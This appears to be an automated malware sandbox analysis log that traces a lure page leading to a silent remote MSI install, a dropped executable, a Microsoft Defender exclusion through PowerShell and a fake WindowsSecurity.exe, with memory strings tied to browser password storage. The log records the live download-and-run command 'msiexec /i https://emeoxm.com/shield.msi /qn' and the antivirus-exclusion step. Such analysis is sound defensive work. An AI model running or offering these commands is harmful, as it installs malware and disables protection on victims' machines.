Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2021/10/LEGO-creator-expert-hotel-10297-778x300.jpg HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2021/10/LEGO-Titanic-10294-778x300.jpg HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2021/03/LEGO-Ideas-Winnie-The-Pooh-21326-banner-778x300.jpg HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2021/04/lego-loony-tunes-collectible-minifigures-58716-banner-2-778x300.jpg HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.3.2 HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/flickr-justified-gallery/lightboxes/swipebox/js/jquery.swipebox.min.js?ver=5.4.16 HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/flickr-justified-gallery/js/jquery.justifiedGallery.min.js?ver=5.4.16 HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/flickr-justified-gallery/js/flickrJustifiedGalleryWPPlugin.js?ver=5.4.16 HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/simple-share-buttons-adder/js/ssba.js?ver=5.4.16 HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/twenty20/assets/js/jquery.twenty20.js?ver=1.5.7 HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/twenty20/assets/js/jquery.event.move.js?ver=1.5.7 HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/3d-flipbook-dflip-lite/assets/js/dflip.min.js?ver=1.7.25 HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /wp-includes/js/wp-embed.min.js?ver=5.4.16 HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=2

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5036:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3116:120:WilError_03

Source: 0xKYIPFUTJYQ.exe, 0000001D.00000003.2069393414.0000026BFF0C9000.00000004.00000020.00020000.00000000.sdmp, WindowsSecurity.exe, 00000020.00000000.2094721510.00007FF647094000.00000002.00000001.01000000.00000009.sdmp, WindowsSecurity.exe, 00000020.00000002.2106202731.00007FF647094000.00000002.00000001.01000000.00000009.sdmp, WindowsSecurity.exe.29.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 0xKYIPFUTJYQ.exe, 0000001D.00000003.2069393414.0000026BFF0C9000.00000004.00000020.00020000.00000000.sdmp, WindowsSecurity.exe, 00000020.00000000.2094721510.00007FF647094000.00000002.00000001.01000000.00000009.sdmp, WindowsSecurity.exe, 00000020.00000002.2106202731.00007FF647094000.00000002.00000001.01000000.00000009.sdmp, WindowsSecurity.exe.29.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 0xKYIPFUTJYQ.exe, 0000001D.00000003.2157431281.0000026BFB714000.00000004.00000020.00020000.00000000.sdmp, 0xKYIPFUTJYQ.exe, 0000001D.00000003.2157256189.0000026BFE635000.00000004.00000020.00020000.00000000.sdmp, 0xKYIPFUTJYQ.exe, 0000001D.00000003.2157431281.0000026BFB70C000.00000004.00000020.00020000.00000000.sdmp, 0xKYIPFUTJYQ.exe, 0000001D.00000003.2119519550.0000026BFB723000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2328,i,11455543749083130041,10888914820382076208,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2356 /prefetch:3
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\index.html"
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /i https://emeoxm.com/shield.msi /qn
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /i https://emeoxm.com/shield.msi /qn
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F9426B40869C4B3B360EEF1BC3593C9A
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\expand.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe "C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe"
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath )))) + path.wstring() + wide::utf8StringToWstring(std::string_view(std::string(skCrypt(
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\WindowsSecurity.exe C:\Windows\system32\WindowsSecurity.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2328,i,11455543749083130041,10888914820382076208,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2356 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe "C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /i https://emeoxm.com/shield.msi /qn	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F9426B40869C4B3B360EEF1BC3593C9A	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\." /SETINTEGRITYLEVEL (CI)(OI)HIGH	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe "C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath )))) + path.wstring() + wide::utf8StringToWstring(std::string_view(std::string(skCrypt(	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: dpx.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Section loaded: cryptbase.dll	Jump to behavior
